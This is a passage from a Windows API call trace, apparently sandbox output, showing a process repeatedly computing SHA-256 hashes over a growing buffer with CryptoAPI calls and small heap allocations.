	[0153.423] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0153.423] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308680
	[0153.423] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308680, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308680, pdwDataLen=0x128aac) returned 1
	[0153.423] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.423] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.423] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.423] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.423] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0153.423] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23086a8
	[0153.423] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23086a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23086a8, pdwDataLen=0x128aac) returned 1
	[0153.423] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.424] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.424] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.424] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.424] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0153.424] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23086d0
	[0153.424] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23086d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23086d0, pdwDataLen=0x128aac) returned 1
	[0153.424] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.424] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.424] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.424] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.424] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0153.425] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23086f8
	[0153.425] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23086f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23086f8, pdwDataLen=0x128aac) returned 1
	[0153.425] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.425] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.425] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.425] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.425] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0153.425] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308720
	[0153.425] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308720, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308720, pdwDataLen=0x128aac) returned 1
	[0153.425] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.425] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.425] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.426] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.426] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0153.426] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.426] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308748
	[0153.426] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308748, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308748, pdwDataLen=0x128aac) returned 1
	[0153.426] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.426] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.426] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.426] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.426] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0153.426] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.426] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308770
	[0153.426] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308770, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308770, pdwDataLen=0x128aac) returned 1
	[0153.426] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.426] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.426] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.427] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.427] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0153.427] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308798
	[0153.427] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308798, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308798, pdwDataLen=0x128aac) returned 1
	[0153.427] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.427] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.427] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.428] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.428] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0153.428] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.428] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23087c0
	[0153.428] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23087c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23087c0, pdwDataLen=0x128aac) returned 1
	[0153.428] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.428] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.428] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.428] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.428] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0153.428] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.428] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23087e8
	[0153.428] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23087e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23087e8, pdwDataLen=0x128aac) returned 1
	[0153.428] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.428] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.428] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.429] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.429] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0153.429] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.429] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308810
	[0153.429] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308810, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308810, pdwDataLen=0x128aac) returned 1
	[0153.429] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.429] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.429] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.429] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.429] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0153.429] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.429] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308838
	[0153.429] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308838, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308838, pdwDataLen=0x128aac) returned 1
	[0153.429] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.429] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.429] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.430] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.430] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0153.430] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.430] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308860
	[0153.430] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308860, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308860, pdwDataLen=0x128aac) returned 1
	[0153.430] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.430] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.430] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.430] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.430] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0153.430] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.430] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308888
	[0153.430] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308888, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308888, pdwDataLen=0x128aac) returned 1
	[0153.430] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.430] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.430] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.431] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.431] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0153.431] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.431] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23088b0
	[0153.431] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23088b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23088b0, pdwDataLen=0x128aac) returned 1
	[0153.431] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.431] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.431] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.431] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.431] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0153.431] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23088d8
	[0153.432] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23088d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23088d8, pdwDataLen=0x128aac) returned 1
	[0153.432] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.432] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.432] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.432] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.432] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0153.432] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308900
	[0153.432] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308900, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308900, pdwDataLen=0x128aac) returned 1
	[0153.432] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.432] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.432] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.433] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.433] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0153.433] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308928
	[0153.433] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308928, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308928, pdwDataLen=0x128aac) returned 1
	[0153.433] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.433] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.433] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.433] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.433] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0153.433] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308950
	[0153.433] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308950, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308950, pdwDataLen=0x128aac) returned 1
	[0153.433] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.433] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.433] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.434] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.434] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0153.434] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308978
	[0153.434] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308978, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308978, pdwDataLen=0x128aac) returned 1
	[0153.434] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.434] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.434] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.434] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.434] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0153.434] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23089a0
	[0153.434] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23089a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23089a0, pdwDataLen=0x128aac) returned 1
	[0153.434] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.434] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.434] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.435] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.435] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0153.435] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23089c8
	[0153.435] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23089c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23089c8, pdwDataLen=0x128aac) returned 1
	[0153.435] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.435] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.435] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.435] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.435] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0153.435] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23089f0
	[0153.435] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23089f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23089f0, pdwDataLen=0x128aac) returned 1
	[0153.435] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.436] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.436] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.436] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.436] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0153.436] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308a18
	[0153.436] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308a18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308a18, pdwDataLen=0x128aac) returned 1
	[0153.436] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.436] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.436] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.436] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.436] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0153.437] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308a40
	[0153.437] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308a40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308a40, pdwDataLen=0x128aac) returned 1
	[0153.437] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.437] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.437] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.437] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.437] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0153.437] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308a68
